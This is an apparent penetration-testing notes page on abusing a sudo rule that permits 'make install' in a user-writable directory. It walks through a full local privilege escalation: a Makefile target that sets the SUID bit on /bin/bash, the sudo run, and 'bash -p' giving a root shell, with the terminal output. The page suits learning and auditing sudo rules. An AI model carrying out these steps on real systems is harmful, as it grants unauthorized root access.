make

Make is a build automation tool that interprets instructions defined in a Makefile to compile and manage dependencies in software projects. It automates repetitive tasks by executing predefined rules, which specify how to transform source files into target files. Widely used in development environments, Make streamlines the build process by only rebuilding components that have changed, improving efficiency and consistency.

Rule Abuse

x7331@kali:~$ sudo -l

User x7331 may run the following commands on kali:
    (ALL) /usr/bin/make install -C /home/x7331/php-spx

The above sudo command explicitly calls make install, which forces the make utility to look for a target named install inside the Makefile located in /home/x7331/php-spx. By placing a malicious command under the install target, arbitrary code execution can be achieved with root privileges. For example, adding chmod u+s /bin/bash to the install rule causes the Bash binary to have its SUID bit set.

x7331@kali:~/php-spx$ cat Makefile
install:
        chmod  u+s /bin/bash

x7331@kali:~/php-spx$ sudo /usr/bin/make install -C /home/x7331/php-spx
make: Entering directory '/home/x7331/php-spx'
chmod  u+s /bin/bash
make: Leaving directory '/home/x7331/php-spx'

Once this change is made, invoking /bin/bash -p will start a Bash shell running with the file owner’s privileges—in this case, root.

x7331@kali:~/php-spx$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash

x7331@kali:~/php-spx$ /bin/bash -p
bash-5.1# id
uid=1000(x7331) gid=1000(x7331) euid=0(root) groups=1000(x7331)